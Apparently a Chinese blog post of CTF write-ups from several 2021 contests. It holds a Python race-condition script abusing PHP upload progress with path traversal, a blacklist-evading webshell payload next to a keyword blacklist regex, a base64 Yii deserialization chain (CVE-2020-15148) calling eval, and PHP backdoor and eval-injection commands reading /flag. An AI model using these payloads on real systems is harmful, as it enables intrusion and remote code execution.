近期一些CTF题解
第一届广东大学生网络安全攻防大赛
Misc
小猪的家
binwalk -e pig.png有压缩包 pigpen.zip
png改成gif
stegsolve改颜色
发现二维码碎片
拼接二维码
JUZFU2C2NJTTETKUKF3Q====
base32 decode:
M2ZhZjg2MTQw
Base64 decode:
3faf86140
是压缩包密码
解压得到猪圈密码
flag{this_isa_pigpen_fake_flag}
CISCN2021
Web
easy_source
原题
https://r0yanx.com/2020/10/28/fslh-writeup/
middle_source
https://blog.csdn.net/mochu7777777/article/details/116499336
PHP_SESSION_UPLOAD_PROGRESS + 条件竞争
扫到.listing
有个you_can_seeeeeeee_me.php
是phpinfo
disable了很多functions
用scandir在etc下手动查找
很可疑
查找后套了很多层目录
每个队的目录不一样
真的是。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
import io
import requests
import threading
sessid = 'AAAA'
data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php $a = scandir("/etc/");var_dump($a);?>',"field":"abcababaa","cf":"../../../../../../../var/lib/php/sessions/dfhjecdbcc/sess_"+sessid}
def write(session):
while True:
resp = session.post('http://121.36.24.90:25186/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php phpinfo();?>'}, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post('http://121.36.24.90:25186/', data=data, files={'file': ('AAAA.txt',f)}, cookies={'PHPSESSID': sessid} )
if(len(resp.text) != 2037):
print(resp.text)
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()
|
红帽杯2021
Web
find_it
http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/robots.txt
When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php
http://eci-2ze5dz17y89pj02zub57.cloudeci1.ichunqiu.com/.1ndexx.php.swp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
| <?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
<title>Hello worldd!</title>
<style>
body {
background-color: white;
text-align: center;
padding: 50px;
font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
}
margin-bottom: 40px;
}
</style>
</head>
<body>
<img id="logo" src="logo.png" />
<h1><?php echo "Hello My freind!"; ?></h1>
<?php if($link) { ?>
<h2>I Can't view my php files?!</h2>
<?php } else { ?>
<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
<?php } ?>
</body>
</html>
<?php
#Really easy...
$file=fopen("flag.php","r") or die("Unable 2 open!");
$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));
$hack=fopen("hack.php","w") or die("Unable 2 open");
$a=$_GET['code'];
if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
die("you die");
}
if(strlen($a)>33){
die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);
fclose($file);
fclose($hack);
?>
|
payload :
index?code=<?php show_source($_GET['a']);?>
hack.php?a=flag.php
读到
1
2
3
4
5
6
7
8
9
| <?php
flag=MZWGCZ33GU2TSMJZMNRTMLLDGQYDGLJUGI3TELLBGFSTCLLEGVQTEMRYMU3DQYRWMZ6Q====;
echo "What is important for a new bird of php??"
?>
|
http://ctf.ssleye.com/base64.html
base32解
framework
源码泄露 www.zip
http://eci-2zecqobeh1kk8w7rdiks.cloudeci1.ichunqiu.com:80
https://forum.butian.net/share/56
原题
CVE-2020-15148
反序列化
/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjIwOiJldmFsKCRfR0VUWyJjb2RlIl0pOyI7fWk6MTtzOjE4OiJldmFsdWF0ZURlcGVuZGVuY3kiO319fQ==&code=phpinfo();
然后蚁剑 disable一把梭
虎符CTF
Web
签到
php源码后门
是agent后面还有一个t
User-Agentt:zerodiumsystem(“cat /flag”);
unsetme
fatfree框架
审计 base.php 530行有eval
构造payload
?a=asd&a=asd%0a,$abc);system(“ls”
